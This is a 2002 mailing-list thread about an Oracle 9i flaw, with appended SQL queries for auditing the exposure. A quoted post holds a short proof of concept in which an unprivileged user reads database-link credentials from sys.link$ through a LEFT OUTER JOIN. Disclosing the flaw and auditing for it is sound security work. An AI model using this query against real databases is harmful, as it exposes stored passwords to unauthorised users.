
Re: 9iDB Security Hole?

From: Daniel Morgan <damorgan_at_exesolutions.com>
Date: Mon, 15 Apr 2002 23:15:13 GMT
Message-ID: <3CBB5EFC.43A50425@exesolutions.com>


Why ouch? This is known for database links for a long, long time. It is not present there if you create the link in one of the manners that supports security.

And no one other than sys should be looking at sys.link$ anyway. If they are, you have been granting SELECT ANY TABLE to people without regard to its implications. In 9i access, even with SELECT ANY TABLE, goes away. And hopefully stays that way.

But if I had my preference, which I don't, Oracle would have encrypted it back at version 7.x or before. I would be interested in hearing from anyone inside of Oracle why this is there. Thanks.

Daniel Morgan

Jonathan Lewis wrote:

> Ouch - 9.0.1.3 on HP-UX
>
> connect / as sysdba
> CREATE USER us1 IDENTIFIED BY us11;
> Grant Create Session To us1;
>
> connect us1/us11
>
> select a.userid, a.password
> from sys.link$ a left outer join sys.link$ b on
> b.name= a.name
> ;
>
> userid password
> --------- --------------
> XXX **********
>
> --
> Jonathan Lewis
> http://www.jlcomp.demon.co.uk
>
> Author of:
> Practical Oracle 8i: Building Efficient Databases
>
> Next Seminar - Australia - July/August
> http://www.jlcomp.demon.co.uk/seminar.html
>
> Host to The Co-Operative Oracle Users' FAQ
> http://www.jlcomp.demon.co.uk/faq/ind_faq.html
>
> Vladimir M. Zakharychev wrote in message ...
> >Anyone with 9i can confirm this?
> >
> >
> >
> >This effectively means that LEFT OUTER JOIN allows to create views
> >on tables that are normally not visible (provided that unprivileged user
> >knows table and column names).
Received on Mon Apr 15 2002 - 18:15:13 CDT
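
The exposure discussed in this thread can be audited from the data dictionary. The queries below are an added example, not part of the original posts; they assume a DBA session with access to the standard `DBA_*` views and `V$PARAMETER`, and they treat the `O7_DICTIONARY_ACCESSIBILITY` parameter (not named in the thread) as the setting that decides whether SELECT ANY TABLE reaches SYS-owned tables.

```sql
-- Added audit example (not from the thread). Run as a DBA.

-- 1. Grantees (users or roles) holding SELECT ANY TABLE directly.
SELECT grantee, admin_option
FROM   dba_sys_privs
WHERE  privilege = 'SELECT ANY TABLE'
ORDER  BY grantee;

-- 2. Users who inherit it through a chain of roles.
--    Start at roles that hold the privilege, then walk up to whoever
--    has been granted those roles, directly or via nested roles.
SELECT DISTINCT r.grantee
FROM  (SELECT grantee
       FROM   dba_role_privs
       START  WITH granted_role IN (SELECT grantee
                                    FROM   dba_sys_privs
                                    WHERE  privilege = 'SELECT ANY TABLE')
       CONNECT BY PRIOR grantee = granted_role) r
WHERE  r.grantee IN (SELECT username FROM dba_users)
ORDER  BY r.grantee;

-- 3. Explicit object grants on SYS.LINK$ (normally there are none).
SELECT grantee, privilege, grantable
FROM   dba_tab_privs
WHERE  owner = 'SYS'
AND    table_name = 'LINK$';

-- 4. Does SELECT ANY TABLE extend to SYS objects on this instance?
--    FALSE means it does not; TRUE restores the pre-9i behaviour.
SELECT name, value
FROM   v$parameter
WHERE  UPPER(name) = 'O7_DICTIONARY_ACCESSIBILITY';

-- 5. Database links that name an account to connect as. These are the
--    links whose credentials are recorded in SYS.LINK$.
SELECT owner, db_link, username, host
FROM   dba_db_links
WHERE  username IS NOT NULL
ORDER  BY owner, db_link;
```

Rows from queries 1 to 3 are the accounts to review; rows from query 5 are the links to consider recreating without stored credentials.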
